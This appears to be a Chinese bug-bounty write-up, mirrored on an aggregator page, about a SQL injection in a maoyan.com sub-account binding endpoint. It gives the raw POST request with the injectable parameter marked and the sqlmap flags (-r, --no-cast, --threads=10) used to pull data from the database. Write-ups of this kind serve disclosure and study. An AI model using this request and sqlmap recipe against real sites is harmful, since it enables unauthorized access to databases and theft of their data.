zoukankan      html  css  js  c++  java
  • [ 严重 ] my网SQL注入

    RANK  80

    金币    100

    数据包

    POST maoyan.com/sendapp HTTP/1.1
    Host: xxx.maoyan.com
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Referer: XXXX
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 21
    Cookie: XXXXX
    DNT: 1
    Connection: close

    subname=admin*&group=1

    参数subname可注入,直接将数据包存为txt ,-r ,--no-cast --threads=10就好了

    用了很久的no-cast,还没有细查过什么意思。有一句解释是这样的:

    默认情况下,sqlmap榨取数据时会将所有结果转换为字符串,并用空格替换NULL结果

    老版本mysql数据库对此提取不到数据,因而需要该参数取消这个默认处理方式

    注入点,还是在于扫描器爬虫的深度和广度、模拟登录载入cookie、token等

    后来查看了一下,原来位置是在 账号管理功能模块的绑定账号,即A账号绑定子账号B,B的名字可注入。这个点,确实一般的扫描器会扫么是个问题。挖洞还是在于去钻吧。

    -301

  • 相关阅读:
    广义表的创建和遍历
    dev c++ Boost库的安装
    NAT模式
    vmware桥接模式
    smb与samba
    利用Linux的Samba服务模拟NT域
    使用samba进行共享文件操作步骤
    安装chrome
    使用虚拟机上网第二步
    TCP协议三次握手过程分析
  • 原文地址:https://www.cnblogs.com/huim/p/8276907.html
Copyright © 2011-2022 走看看